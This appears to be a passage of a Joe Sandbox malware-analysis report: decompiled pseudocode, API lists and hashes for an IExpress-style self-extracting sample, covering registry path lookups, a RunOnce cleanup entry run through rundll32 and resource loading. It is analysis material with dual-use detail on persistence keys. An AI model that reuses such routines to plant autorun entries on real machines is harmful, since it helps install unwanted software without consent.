                                                                                                                                                                                                          				intOrPtr _t34;
                                                                                                                                                                                                          				int _t45;
                                                                                                                                                                                                          				int* _t50;
                                                                                                                                                                                                          				CHAR* _t52;
                                                                                                                                                                                                          				CHAR* _t61;
                                                                                                                                                                                                          				char* _t62;
                                                                                                                                                                                                          				int _t63;
                                                                                                                                                                                                          				CHAR* _t64;
                                                                                                                                                                                                          				signed int _t65;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t52 = __ecx;
                                                                                                                                                                                                          				_t23 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                          				_t62 = _a4;
                                                                                                                                                                                                          				_t50 = 0;
                                                                                                                                                                                                          				_t61 = __ecx;
                                                                                                                                                                                                          				_v276 = _t62;
                                                                                                                                                                                                          				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                          				if( *_t62 != 0x23) {
                                                                                                                                                                                                          					_t63 = 0x104;
                                                                                                                                                                                                          					goto L14;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t64 = _t62 + 1;
                                                                                                                                                                                                          					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                          					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                          					_t63 = 0x104;
                                                                                                                                                                                                          					_t34 = _v269;
                                                                                                                                                                                                          					if(_t34 == 0x53) {
                                                                                                                                                                                                          						L14:
                                                                                                                                                                                                          						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                          						goto L15;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						if(_t34 == 0x57) {
                                                                                                                                                                                                          							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                          							goto L16;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_push(_t52);
                                                                                                                                                                                                          							_v288 = 0x104;
                                                                                                                                                                                                          							E00861781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                          							_t59 = 0x104;
                                                                                                                                                                                                          							E0086658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                          							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                          								L16:
                                                                                                                                                                                                          								_t59 = _t63;
                                                                                                                                                                                                          								E0086658A(_t61, _t63, _v276);
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								if(RegQueryValueExA(_v284, 0x861140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                          									_t45 = _v280;
                                                                                                                                                                                                          									if(_t45 != 2) {
                                                                                                                                                                                                          										L9:
                                                                                                                                                                                                          										if(_t45 == 1) {
                                                                                                                                                                                                          											goto L10;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                          											_t45 = _v280;
                                                                                                                                                                                                          											goto L9;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_t59 = 0x104;
                                                                                                                                                                                                          											E00861680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                          											L10:
                                                                                                                                                                                                          											_t50 = 1;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								RegCloseKey(_v284);
                                                                                                                                                                                                          								L15:
                                                                                                                                                                                                          								if(_t50 == 0) {
                                                                                                                                                                                                          									goto L16;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                          			}























                                                                                                                                                                                                          0x00862773
                                                                                                                                                                                                          0x0086277e
                                                                                                                                                                                                          0x00862785
                                                                                                                                                                                                          0x0086278a
                                                                                                                                                                                                          0x0086278d
                                                                                                                                                                                                          0x00862790
                                                                                                                                                                                                          0x00862792
                                                                                                                                                                                                          0x00862798
                                                                                                                                                                                                          0x0086279d
                                                                                                                                                                                                          0x008628b2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008627a3
                                                                                                                                                                                                          0x008627a3
                                                                                                                                                                                                          0x008627af
                                                                                                                                                                                                          0x008627c2
                                                                                                                                                                                                          0x008627c8
                                                                                                                                                                                                          0x008627cd
                                                                                                                                                                                                          0x008627d5
                                                                                                                                                                                                          0x008628b7
                                                                                                                                                                                                          0x008628b9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008627db
                                                                                                                                                                                                          0x008627dd
                                                                                                                                                                                                          0x008628aa
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008627e3
                                                                                                                                                                                                          0x008627e3
                                                                                                                                                                                                          0x008627ec
                                                                                                                                                                                                          0x008627f8
                                                                                                                                                                                                          0x00862803
                                                                                                                                                                                                          0x0086280b
                                                                                                                                                                                                          0x00862831
                                                                                                                                                                                                          0x008628c3
                                                                                                                                                                                                          0x008628c9
                                                                                                                                                                                                          0x008628cd
                                                                                                                                                                                                          0x00862837
                                                                                                                                                                                                          0x0086285a
                                                                                                                                                                                                          0x0086285c
                                                                                                                                                                                                          0x00862865
                                                                                                                                                                                                          0x00862892
                                                                                                                                                                                                          0x00862895
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862867
                                                                                                                                                                                                          0x00862878
                                                                                                                                                                                                          0x0086288c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086287a
                                                                                                                                                                                                          0x00862880
                                                                                                                                                                                                          0x00862885
                                                                                                                                                                                                          0x00862897
                                                                                                                                                                                                          0x00862899
                                                                                                                                                                                                          0x00862899
                                                                                                                                                                                                          0x00862878
                                                                                                                                                                                                          0x00862865
                                                                                                                                                                                                          0x008628a0
                                                                                                                                                                                                          0x008628bf
                                                                                                                                                                                                          0x008628c1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008628c1
                                                                                                                                                                                                          0x00862831
                                                                                                                                                                                                          0x008627dd
                                                                                                                                                                                                          0x008627d5
                                                                                                                                                                                                          0x008628e5

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CharUpperA.USER32(B82E2007,00000000,00000000,00000000), ref: 008627A8
                                                                                                                                                                                                          • CharNextA.USER32(0000054D), ref: 008627B5
                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 008627BC
                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00862829
                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,00861140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00862852
                                                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00862870
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 008628A0
                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 008628AA
                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32 ref: 008628B9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 008627E4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                          • API String ID: 2659952014-2428544900
                                                                                                                                                                                                          • Opcode ID: c62b548e544eb7d1ca769ce397ad3c97e6ff30a09d531ea96db3b49a7047107e
                                                                                                                                                                                                          • Instruction ID: c7783b8d520922d38472b43f9ae940d02927fb14c8c32ee714d15e5101d09e45
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c62b548e544eb7d1ca769ce397ad3c97e6ff30a09d531ea96db3b49a7047107e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7441A071E0012CABDB249B649C85AFA7BBDFB15700F0640E9F549E3101DBB48E858FA2
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 62%
                                                                                                                                                                                                          			E00862267() {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				char _v836;
                                                                                                                                                                                                          				void* _v840;
                                                                                                                                                                                                          				int _v844;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t19;
                                                                                                                                                                                                          				intOrPtr _t33;
                                                                                                                                                                                                          				void* _t38;
                                                                                                                                                                                                          				intOrPtr* _t42;
                                                                                                                                                                                                          				void* _t45;
                                                                                                                                                                                                          				void* _t47;
                                                                                                                                                                                                          				void* _t49;
                                                                                                                                                                                                          				signed int _t51;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t19 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                          				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                          				if( *0x868530 != 0) {
                                                                                                                                                                                                          					_push(_t49);
                                                                                                                                                                                                          					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                          						_push(_t38);
                                                                                                                                                                                                          						_v844 = 0x238;
                                                                                                                                                                                                          						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                          							_push(_t47);
                                                                                                                                                                                                          							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                          							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                          								E0086658A( &_v268, 0x104, 0x861140);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                          							E0086171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                          							_t42 =  &_v836;
                                                                                                                                                                                                          							_t45 = _t42 + 1;
                                                                                                                                                                                                          							_pop(_t47);
                                                                                                                                                                                                          							do {
                                                                                                                                                                                                          								_t33 =  *_t42;
                                                                                                                                                                                                          								_t42 = _t42 + 1;
                                                                                                                                                                                                          							} while (_t33 != 0);
                                                                                                                                                                                                          							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                          						_pop(_t38);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_pop(_t49);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                          			}



















                                                                                                                                                                                                          0x00862272
                                                                                                                                                                                                          0x00862277
                                                                                                                                                                                                          0x00862279
                                                                                                                                                                                                          0x00862283
                                                                                                                                                                                                          0x00862289
                                                                                                                                                                                                          0x008622ab
                                                                                                                                                                                                          0x008622b1
                                                                                                                                                                                                          0x008622c4
                                                                                                                                                                                                          0x008622e0
                                                                                                                                                                                                          0x008622e6
                                                                                                                                                                                                          0x008622f5
                                                                                                                                                                                                          0x0086230d
                                                                                                                                                                                                          0x0086231c
                                                                                                                                                                                                          0x0086231c
                                                                                                                                                                                                          0x00862321
                                                                                                                                                                                                          0x0086233a
                                                                                                                                                                                                          0x00862342
                                                                                                                                                                                                          0x00862348
                                                                                                                                                                                                          0x0086234b
                                                                                                                                                                                                          0x0086234c
                                                                                                                                                                                                          0x0086234c
                                                                                                                                                                                                          0x0086234e
                                                                                                                                                                                                          0x0086234f
                                                                                                                                                                                                          0x0086236e
                                                                                                                                                                                                          0x0086236e
                                                                                                                                                                                                          0x0086237a
                                                                                                                                                                                                          0x00862380
                                                                                                                                                                                                          0x00862380
                                                                                                                                                                                                          0x00862381
                                                                                                                                                                                                          0x00862381
                                                                                                                                                                                                          0x0086238f

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 008622A3
                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 008622D8
                                                                                                                                                                                                          • memset.MSVCRT ref: 008622F5
                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32 ref: 00862305
                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0086236E
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0086237A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00862321
                                                                                                                                                                                                          • wextract_cleanup0, xrefs: 0086227C, 008622CD, 00862363
                                                                                                                                                                                                          • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0086232D
                                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00862299
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                                          • API String ID: 3027380567-2554356261
                                                                                                                                                                                                          • Opcode ID: 96d67d3cb35d55b447b3a1d23522ac07955b32b630e7fb95cc1dae788ee53f96
                                                                                                                                                                                                          • Instruction ID: c2b70284af2f3de93c09b3704fb2902241385d9ad0a48ce81613d410f81f8bb0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96d67d3cb35d55b447b3a1d23522ac07955b32b630e7fb95cc1dae788ee53f96
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E131B471A00218ABDB219B55DC49FEA7B7CFB14700F0501E9F50DEA251EB75AB88CE51
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 87%
                                                                                                                                                                                                          			E00863100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                          				void* _t8;
                                                                                                                                                                                                          				void* _t11;
                                                                                                                                                                                                          				void* _t15;
                                                                                                                                                                                                          				struct HWND__* _t16;
                                                                                                                                                                                                          				struct HWND__* _t33;
                                                                                                                                                                                                          				struct HWND__* _t34;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t8 = _a8 - 0xf;
                                                                                                                                                                                                          				if(_t8 == 0) {
                                                                                                                                                                                                          					if( *0x868590 == 0) {
                                                                                                                                                                                                          						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                          						 *0x868590 = 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L13:
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t11 = _t8 - 1;
                                                                                                                                                                                                          				if(_t11 == 0) {
                                                                                                                                                                                                          					L7:
                                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                                          					L8:
                                                                                                                                                                                                          					EndDialog(_a4, ??);
                                                                                                                                                                                                          					L9:
                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t15 = _t11 - 0x100;
                                                                                                                                                                                                          				if(_t15 == 0) {
                                                                                                                                                                                                          					_t16 = GetDesktopWindow();
                                                                                                                                                                                                          					_t33 = _a4;
                                                                                                                                                                                                          					E008643D0(_t33, _t16);
                                                                                                                                                                                                          					SetDlgItemTextA(_t33, 0x834,  *0x868d4c);
                                                                                                                                                                                                          					SetWindowTextA(_t33, "herso");
                                                                                                                                                                                                          					SetForegroundWindow(_t33);
                                                                                                                                                                                                          					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                          					 *0x8688b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                          					SetWindowLongA(_t34, 0xfffffffc, E008630C0);
                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_t15 != 1) {
                                                                                                                                                                                                          					goto L13;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_a12 != 6) {
                                                                                                                                                                                                          					if(_a12 != 7) {
                                                                                                                                                                                                          						goto L9;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L7;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_push(1);
                                                                                                                                                                                                          				goto L8;
                                                                                                                                                                                                          			}









                                                                                                                                                                                                          0x00863108
                                                                                                                                                                                                          0x0086310b
                                                                                                                                                                                                          0x008631b7
                                                                                                                                                                                                          0x008631ca
                                                                                                                                                                                                          0x008631d0
                                                                                                                                                                                                          0x008631d0
                                                                                                                                                                                                          0x008631da
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008631da
                                                                                                                                                                                                          0x00863111
                                                                                                                                                                                                          0x00863114
                                                                                                                                                                                                          0x00863136
                                                                                                                                                                                                          0x00863136
                                                                                                                                                                                                          0x00863138
                                                                                                                                                                                                          0x0086313b
                                                                                                                                                                                                          0x00863141
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863143
                                                                                                                                                                                                          0x00863116
                                                                                                                                                                                                          0x0086311b
                                                                                                                                                                                                          0x0086314b
                                                                                                                                                                                                          0x00863151
                                                                                                                                                                                                          0x00863158
                                                                                                                                                                                                          0x0086316a
                                                                                                                                                                                                          0x00863176
                                                                                                                                                                                                          0x0086317d
                                                                                                                                                                                                          0x0086318b
                                                                                                                                                                                                          0x0086319e
                                                                                                                                                                                                          0x008631a3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008631ad
                                                                                                                                                                                                          0x00863120
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086312a
                                                                                                                                                                                                          0x00863134
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00863134
                                                                                                                                                                                                          0x0086312c
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EndDialog.USER32(?,00000000), ref: 0086313B
                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0086314B
                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,00000834), ref: 0086316A
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,herso), ref: 00863176
                                                                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 0086317D
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000834), ref: 00863185
                                                                                                                                                                                                          • GetWindowLongA.USER32(00000000,000000FC), ref: 00863190
                                                                                                                                                                                                          • SetWindowLongA.USER32(00000000,000000FC,008630C0), ref: 008631A3
                                                                                                                                                                                                          • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 008631CA
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                          • String ID: herso
                                                                                                                                                                                                          • API String ID: 3785188418-3992069730
                                                                                                                                                                                                          • Opcode ID: a3508c762be2b3bc47381a43c782c7d4980fe7d0b20f7addea1d5cf1dac7e47e
                                                                                                                                                                                                          • Instruction ID: 223c8366f1ce11e0392b50ca2571c9a0a2bc0a8cc94424a095986aace8c24681
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3508c762be2b3bc47381a43c782c7d4980fe7d0b20f7addea1d5cf1dac7e47e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED11D331644255FBDB115F24AC0CB5A3A64FB4B724F131611F926E22E0DFF59A41CB52
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                          			E0086468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                          				long _t4;
                                                                                                                                                                                                          				void* _t11;
                                                                                                                                                                                                          				CHAR* _t14;
                                                                                                                                                                                                          				void* _t15;
                                                                                                                                                                                                          				long _t16;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t14 = __ecx;
                                                                                                                                                                                                          				_t11 = __edx;
                                                                                                                                                                                                          				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                          				_t16 = _t4;
                                                                                                                                                                                                          				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                          					if(_t16 == 0) {
                                                                                                                                                                                                          						L5:
                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                          					if(_t15 == 0) {
                                                                                                                                                                                                          						goto L5;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                          					FreeResource(_t15);
                                                                                                                                                                                                          					return _t16;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t4;
                                                                                                                                                                                                          			}








                                                                                                                                                                                                          0x00864699
                                                                                                                                                                                                          0x0086469b
                                                                                                                                                                                                          0x008646a9
                                                                                                                                                                                                          0x008646af
                                                                                                                                                                                                          0x008646b4
                                                                                                                                                                                                          0x008646bc
                                                                                                                                                                                                          0x008646f9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008646f9
                                                                                                                                                                                                          0x008646d9
                                                                                                                                                                                                          0x008646dd
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008646e5
                                                                                                                                                                                                          0x008646ef
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008646f5
                                                                                                                                                                                                          0x008646ff

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646A0
                                                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646A9
                                                                                                                                                                                                          • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646C3
                                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646CC
                                                                                                                                                                                                          • LockResource.KERNEL32(00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646D3
                                                                                                                                                                                                          • memcpy_s.MSVCRT ref: 008646E5
                                                                                                                                                                                                          • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008646EF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                          • String ID: TITLE$herso
                                                                                                                                                                                                          • API String ID: 3370778649-823998585
                                                                                                                                                                                                          • Opcode ID: 5a85dce2a8f3e0d06d0613bab782cb286893e60fb367663001ed70794b0c10d2
                                                                                                                                                                                                          • Instruction ID: 57a92e4848f4d98f8c94b03a6dc387b11393de090a13c888f368c21084dd28e4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a85dce2a8f3e0d06d0613bab782cb286893e60fb367663001ed70794b0c10d2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC018636244210BBF3541BA5AC4DF6B7E2DFBD6B51F061014FA4AE6150C9F188418AA6
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 57%
                                                                                                                                                                                                          			E008617EE(intOrPtr* __ecx) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				short _v12;
                                                                                                                                                                                                          				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                          				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                          				intOrPtr* _v28;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t14;
                                                                                                                                                                                                          				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                          				long _t28;
                                                                                                                                                                                                          				void* _t35;
                                                                                                                                                                                                          				struct HINSTANCE__* _t36;
                                                                                                                                                                                                          				signed int _t38;
                                                                                                                                                                                                          				intOrPtr* _t39;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t14 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                          				_v12 = 0x500;
                                                                                                                                                                                                          				_t37 = __ecx;
                                                                                                                                                                                                          				_v16.Value = 0;
                                                                                                                                                                                                          				_v28 = __ecx;
                                                                                                                                                                                                          				_t28 = 0;
                                                                                                                                                                                                          				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                          				if(_t36 != 0) {
                                                                                                                                                                                                          					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                          					_v20 = _t20;
                                                                                                                                                                                                          					if(_t20 != 0) {
                                                                                                                                                                                                          						 *_t37 = 0;
